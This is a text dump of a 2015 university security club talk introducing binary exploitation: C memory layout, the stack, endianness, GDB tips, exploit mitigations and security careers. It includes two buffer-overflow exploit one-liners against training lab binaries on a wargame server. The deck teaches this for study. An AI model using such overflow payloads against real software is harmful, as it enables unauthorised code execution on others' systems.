security & exploitation - science at...
Post on 05-Apr-2018
223 Views
Preview:
TRANSCRIPT
whoami
RPISEC - 05/11/2015 OS Security 2
• Markus Gaasedelen – B.S. Computer Science ’15
• Security Enthusiast
– I like to hack things
• President of RPISEC
– http://rpis.ec
What is RPISEC? • The Computer Security Club @ RPI
– http://rpis.ec
• The leading authority on campus for any and all things computer security related
• We compete in hacking competitions known as CTFs (Capture The Flag) and we’re very good at them
RPISEC - 05/11/2015 OS Security 3
What is RPISEC? • The Computer Security Club @ RPI
– http://rpis.ec
• The leading authority on campus for any and all things computer security related
• We compete in hacking competitions known as CTFs (Capture The Flag) and we’re very good at them
• We teach cool and applicable security skills at our weekly meetings – 5-7pm Fridays, DCC 324
RPISEC - 05/11/2015 OS Security 7
What is Security? • Security == Hacking
– ‘politically correct’ – Cyber is the buzzword
• Very technical and
rewarding challenges
• Rarely touched upon in academia
• Many different categories of security
RPISEC - 05/11/2015 OS Security 11
Categories of Security • Cryptography • Web Security • Vulnerability Research • Binary Exploitation • Reverse Engineering • Malware Analysis • Systems Security • Embedded Hardware Hacking • Network Security • Digital Forensics • Physical Security • Pentesting • …
RPISEC - 05/11/2015 OS Security 12
Categories of Security • Cryptography • Web Security • Vulnerability Research • Binary Exploitation • Reverse Engineering • Malware Analysis • Systems Security • Embedded Hardware Hacking • Network Security • Digital Forensics • Physical Security • Pentesting • …
RPISEC - 05/11/2015 OS Security 13
The kind of stuff I’ll talk about today
Defining Binary Exploitation
• Binary Exploitation – Carefully leveraging bugs in an application to
cause extreme but controlled failure
RPISEC - 05/11/2015 OS Security 15
Binary Exploitation
But what does that even mean?
RPISEC - 05/11/2015 OS Security 18
‘extreme but controlled failure’
Super Mario World Sillyness
RPISEC - 05/11/2015 OS Security 25
https://youtu.be/jnZ2NNYySuE?t=38
Defining Binary Exploitation
• Binary Exploitation – Carefully leveraging bugs in an application to
cause extreme but controlled failure
• Exploitation requires intimate knowledge of
the language, compiler, and the machine
RPISEC - 05/11/2015 OS Security 26
The Unexciting Languages
• Binary exploitation isn’t really a thing for managed or scripting languages – C#, .NET, JavaScript, Lua, Python, etc
RPISEC - 05/11/2015 OS Security 28
The Unexciting Languages
• Binary exploitation isn’t really a thing for managed or scripting languages – C#, .NET, JavaScript, Lua, Python, etc
• Slower, automates a lot of stuff for you
– Driving an automatic
RPISEC - 05/11/2015 OS Security 30
The C Language
• C is a ‘low level’ language – Compiles straight to machine code
• Very fast
RPISEC - 05/11/2015 OS Security 32
The C Language
• C is a ‘low level’ language – Compiles straight to machine code
• Very fast
– Very fine control over the machine and memory • It’s like driving a manual!
RPISEC - 05/11/2015 OS Security 34
The C Language
• C is a ‘low level’ language – Compiles straight to machine code
• Very fast
– Very fine control over the machine and memory • It’s like driving a manual!
– Easy to do stupid things
RPISEC - 05/11/2015 OS Security 35
Pulling Back the Curtain
RPISEC - 05/11/2015 OS Security 38
“… there's way too much information to decode the Matrix. You get used to it, though. Your brain does the translating. I don't even see the code. All I see is blonde, brunette, redhead.” -Cypher, The Matrix
WELCOME TO THE WARZONE let’s dive right in and try breaking some stuff
RPISEC - 05/11/2015 OS Security 39
Getting Started / Tips
• cd /levels/lab2 • ./lab2C AAAA… • python –c ‘print “A”*20’ • gdb ./lab2C
– run
• In GDB: – Info functions – Info registers
• i r
– disassemble <function> • disas main
– breakpoint <function> • b main
– breakpoint * <address> • b * 0x08048455
RPISEC - 05/11/2015 OS Security 41
Stack Overview • The stack is a region of
memory for a program to maintain function variables, arguments, and control flow metadata during execution
RPISEC - 05/11/2015 OS Security 42
Endianess
• Endianess – How data is stored in memory
• Modern computers are generally little endian – ‘little end in’
• Endianess can be confusing, and I don’t want to get
into the details – 0x41424344 stored as 0x44, 0x43, 0x42, 0x41 – 0xdeadbeef stored as 0xef, 0xbe, 0xad, 0xde
RPISEC - 05/11/2015 OS Security 47
lab2C Exploit
./lab2C $(python -c 'print "A"*15 + "\xef\xbe\xad\xde"')
RPISEC - 05/11/2015 OS Security 48
Example ELF / EXE in Memory
RPISEC - 05/11/2015 OS Security 50
Runtime Memory
Stack
ELF Executable
.text segment
.data segment
Heap
0x00000000 – Start of memory
0xFFFFFFFF – End of memory
0x08048000 – Start of .text Segment
0xbfff0000 – Top of stack
Libraries (libc)
.text segment
Example ELF / EXE in Memory
RPISEC - 05/11/2015 OS Security 51
Runtime Memory
Stack
Heap
Executable code
Libraries (libc)
ELF Executable
.text segment
.data segment
.text segment
Example ELF / EXE in Memory
RPISEC - 05/11/2015 OS Security 52
Runtime Memory
Stack
Heap
Executable code
Libraries (libc)
ELF Executable
.text segment
.data segment
EIP
.text segment
Example ELF / EXE in Memory
RPISEC - 05/11/2015 OS Security 53
Runtime Memory
Stack
Heap
Executable code
Libraries (libc)
ELF Executable
.text segment
.data segment EIP
.text segment
Example ELF / EXE in Memory
RPISEC - 05/11/2015 OS Security 54
Runtime Memory
Stack
Heap
Executable code
Libraries (libc)
ELF Executable
.text segment
.data segment EIP
.text segment
Example ELF / EXE in Memory
RPISEC - 05/11/2015 OS Security 55
Runtime Memory
Stack
Heap
Executable code
Libraries (libc)
ELF Executable
.text segment
.data segment EIP
.text segment
Example ELF / EXE in Memory
RPISEC - 05/11/2015 OS Security 56
Runtime Memory
Stack
Heap
Executable code
Libraries (libc)
ELF Executable
.text segment
.data segment EIP
.text segment
Example ELF / EXE in Memory
RPISEC - 05/11/2015 OS Security 57
Runtime Memory
Stack
Heap
Executable code
Libraries (libc)
ELF Executable
.text segment
.data segment
EIP
.text segment
Example ELF / EXE in Memory
RPISEC - 05/11/2015 OS Security 58
Runtime Memory
Stack
Heap
Libraries (libc)
ELF Executable
.text segment
.data segment
EIP
.text segment
Example ELF / EXE in Memory
RPISEC - 05/11/2015 OS Security 59
Runtime Memory
Stack
Heap
Libraries (libc)
ELF Executable
.text segment
.data segment
EIP
.text segment
Example ELF / EXE in Memory
RPISEC - 05/11/2015 OS Security 60
Runtime Memory
Stack
Heap
Executable code
Libraries (libc)
ELF Executable
.text segment
.data segment
EIP
.text segment
Example ELF / EXE in Memory
RPISEC - 05/11/2015 OS Security 61
Runtime Memory
Stack
Heap
Libraries (libc)
ELF Executable
.text segment
.data segment
EIP
“If your program simply segfaulted, consider yourself lucky.”
-Chuck Stewart
RPISEC - 05/11/2015 OS Security 80
warzone.rpis.ec SSH in as lab2B
use the password you got from solving lab2C
RPISEC - 05/11/2015 OS Security 82
lab2B Exploit
./lab2B $(python -c 'print "A"*27 + "\x7d\x84\x04\x08" + "B"*4 + "\xa0\x85\x04\x08"')
RPISEC - 05/11/2015 OS Security 84
Modern Protections
• Data Execution Prevention (DEP) • Address Space Layout Randomization (ASLR) • Stack Cookies (Canaries) • Read Only Relocation (RELRO) • FORTIFY_SOURCE • … • These only make things harder, not impossible
RPISEC - 05/11/2015 OS Security 85
links.exe
• Challenge from the CSAW 2014 CTF Finals • 64bit exploitation on Windows 8.1
– Basically all protections are on by default
• No source code, lots of x64 reversing – Doubly linked circular list implementation
• pushfront, pushback, delete, copy, print, sort …
RPISEC - 05/11/2015 OS Security 88
Wrapping up Binary Exploitation • You might consider yourself a *rockstar* programmer, but
you probably know little to nothing about secure coding practices or the implications of your mistakes
• Compilers go out of their way to prevent your bugs from causing catastrophic failure
• Because your program doesn’t appear to segfault or crash, doesn’t mean it is bug free or without vulnerabilities
• Binary exploitation is nothing like standard software development - I truly think of it as an art
RPISEC - 05/11/2015 OS Security 92
…so…many…jobs…
• Typical titles / positions – Information Security Analyst / Engineer – Security Software Engineer – Vulnerability Research Engineer – Web Application Security Engineer – Computer Network Operations – Threat & Incident Response Engineer – Product Security Reverse Engineer – Malware Analyst / Reverse Engineer – …
RPISEC - 05/11/2015 OS Security 94
Entering the Job Market
• There is a major shortage of qualified security individuals in industry
• Skilled in security & have a B.S. in CS? – Government, Contractors, FFRDCs
• $70k – $100k – Private / Commercial
• $100k – ??
• Anything less and you’re missing out
RPISEC - 05/11/2015 OS Security 95
Security @ RPI
• Malware Analysis – Fall 2015 – Coming soon!
• Modern Binary Exploitation – Spring 2015 – http://rpis.ec/binexp/
• Hardware Reverse Engineering – Spring 2014 – http://security.cs.rpi.edu/courses/hwre-spring2014/
• Malware Analysis – Spring 2013 – http://security.cs.rpi.edu/courses/malware-spring2013/
• Secure Software Principles – Spring 2010 – http://cs.rpi.edu/academics/courses/spring10/csci4971/
RPISEC - 05/11/2015 OS Security 98
top related